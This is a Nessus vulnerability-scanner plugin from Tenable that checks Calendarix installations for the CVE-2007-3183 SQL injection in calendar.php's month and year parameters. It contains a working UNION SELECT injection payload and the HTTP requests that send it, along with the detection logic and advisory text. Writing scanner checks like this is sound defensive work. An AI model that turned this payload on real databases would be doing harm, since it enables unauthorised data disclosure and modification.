#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that is prone to SQL
injection attacks. 

Description :

The remote host is running Calendarix, a free web-based calendar
application written in PHP. 

The version of Calendarix installed on the remote host fails to
sanitize input to the 'month' and 'year' parameters of the
'calendar.php' script before using it in database queries.  Provided
PHP's 'magic_quotes_gpc' setting is disabled, an unauthenticated
attacker can exploit these flaws to manipulate database queries, which
may lead to disclosure of sensitive information, modification of data,
or attacks against the underlying database. 

See also :

http://www.netvigilance.com/advisory0038
http://www.securityfocus.com/archive/1/472221/30/0/threaded

Solution :

Unknown at this time.

Risk factor : 

Medium / CVSS Base Score : 6.8
(CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(25567);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-3183");
  script_bugtraq_id(24633);
  script_xref(name:"OSVDB", value:"35373");

  script_name(english:"Calendarix month and year parameter SQL Injection Vulnerabilities");
  script_summary(english:"Tries to control output from calendar.php");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);

pass = unixtime();
user = SCRIPT_NAME;
sql = string("' UNION SELECT 1,1,'", pass, "','", user, "',1 #");
if (thorough_tests) 
{
  exploits = make_list(
    string("/calendar.php?month=", urlencode(str:sql)),
    string("/calendar.php?month=&year=", urlencode(str:sql))
  );
}
else 
{
  exploits = make_list(
    string("/calendar.php?month=", urlencode(str:sql))
  );
}


# Loop through directories.
if (thorough_tests) dirs = make_list("/calendarix", "/calendar", cgi_dirs());
else dirs = make_list(cgi_dirs());

info = "";
foreach dir (dirs)
{
  # Try to exploit the issue(s).
  foreach exploit (exploits)
  {
    req = http_get(item:string(dir, exploit), port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # There's a problem if we see our values in the output.
    if (
      "Calendarix" >< res &&
      (  string("<div class=smallcalevtime>", user, "<") >< res &&
        string(');">', pass, '</a>') >< res
      )
    ) info += '  ' + dir + exploit + '\n';
  }
  if (!thorough_tests) break;
}


if (info)
{
  report = string(
    desc,
    "\n\n",
    "Plugin output :\n",
    "\n",
    "The following URI(s) demonstrate the issues :\n",
    "\n",
    info
  );
  security_warning(port:port, data:report);
}
